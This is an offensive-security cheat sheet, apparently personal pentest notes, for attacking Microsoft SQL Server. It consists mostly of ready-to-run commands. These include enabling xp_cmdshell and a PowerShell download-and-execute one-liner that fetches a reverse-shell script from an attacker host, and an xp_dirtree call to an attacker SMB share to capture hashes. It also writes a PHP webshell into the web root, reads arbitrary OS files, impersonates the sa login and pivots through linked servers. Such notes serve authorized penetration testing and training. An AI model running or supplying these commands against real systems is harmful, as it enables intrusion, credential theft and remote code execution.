MSSQL
sqlcmd -S SRVMSSQL -U julio -P 'MyPassword!' -y 30 -Y 30
MSSQL default system schemas/databases:
master- keeps the information for an instance of SQL Server.msdb- used by SQL Server Agent.model- a template database copied for each new database.resource- a read-only database that keeps system objects visible in every database on the server in sys schema.tempdb- keeps temporary objects for SQL queries.
Login it to mssql remotely
sqsh -S $ip -U sa -P <PASSWORD>alternatively use
mssqlclient.py user:password@$ip -windows-author without --windows-auth
mssqlclient.py user:password@$ipInteractive with MSSQL
Check for users with SA level permissions (users that can enable xp_cmdshell)
select IS_SRVROLEMEMBER ('sysadmin')Run after spinning up an smbserver to capture hash
exec master..xp_dirtree '\\<attacker ip>\<share name>\',1,1
GOEXEC master..xp_subdirs '\\10.10.110.17\share\'
GOCheck if xp_cmdshell is enabled
SELECT * FROM sys.configurations WHERE name = 'xp_cmdshell';Show Advanced Options
sp_configure 'show advanced options', '1'RECONFIGUREEnable xp_cmdshell
sp_configure 'xp_cmdshell', '1'RECONFIGUREEXEC master..xp_cmdshell 'whoami'xp_cmdshell powershell iex(new-objectnet.webclient).downloadstring(\"http://AttackerIP/Invoke-PowerShellTcp.ps1\")Enable File Write (Ole Automation Procedures)
sp_configure 'show advanced options', 1
GO
RECONFIGURE
GO
sp_configure 'Ole Automation Procedures', 1
GO
RECONFIGURE
GO
MSSQL, we need to enable Ole Automation Procedures, which requires admin privileges, and then execute some stored procedures to create the fileWrite File
DECLARE @OLE INT
DECLARE @FileID INT
EXECUTE sp_OACreate 'Scripting.FileSystemObject', @OLE OUT
EXECUTE sp_OAMethod @OLE, 'OpenTextFile', @FileID OUT, 'c:\inetpub\wwwroot\webshell.php', 8, 1
EXECUTE sp_OAMethod @FileID, 'WriteLine', Null, '<?php echo shell_exec($_GET["c"]);?>'
EXECUTE sp_OADestroy @FileID
EXECUTE sp_OADestroy @OLE
GO
Read File
SELECT * FROM OPENROWSET(BULK N'C:/Windows/System32/drivers/etc/hosts', SINGLE_CLOB) AS Contents
GO
MSSQL allows file read on any file in the operating system to which the account has read accessImpersonate Existing Users
Identify Users that We Can Impersonate
select distinct b.name from sys.server_permissions a inner join sys.server_principals b on a.grantor_principal_id = b.principal_id where a.permission_name = 'IMPERSONATE'
GO
IMPERSONATE, that allows the executing user to take on the permissions of another user or login until the context is reset or the session ends. Sysadmins can impersonate anyone by default, But for non-administrator users, privileges must be explicitly assigned.Verifying our Current User and Role
SELECT SYSTEM_USER
SELECT IS_SRVROLEMEMBER('sysadmin')
go
0 indicates, we do not have the sysadmin role, but we can impersonate the sa userImpersonating the SA User
EXECUTE AS LOGIN = 'sa'
SELECT SYSTEM_USER
SELECT IS_SRVROLEMEMBER('sysadmin')
GO
EXECUTE AS LOGIN within the master DB, because all users, by default, have access to that database. If a user you are trying to impersonate doesn't have access to the DB you are connecting to it will present an error. Try to move to the master DB using USE masterWe can now execute any command as a sysadmin as the returned value 1 indicates.Communicate with Other Databases with MSSQL
Identify linked Servers in MSSQL
SELECT srvname, isremote FROM sysservers
GO
isremote, where 1 means is a remote server, and 0 is a linked serverEXECUTE('select @@servername, @@version, system_user, is_srvrolemember(''sysadmin'')') AT [10.0.0.12\SQLEXPRESS]
GO
Last updated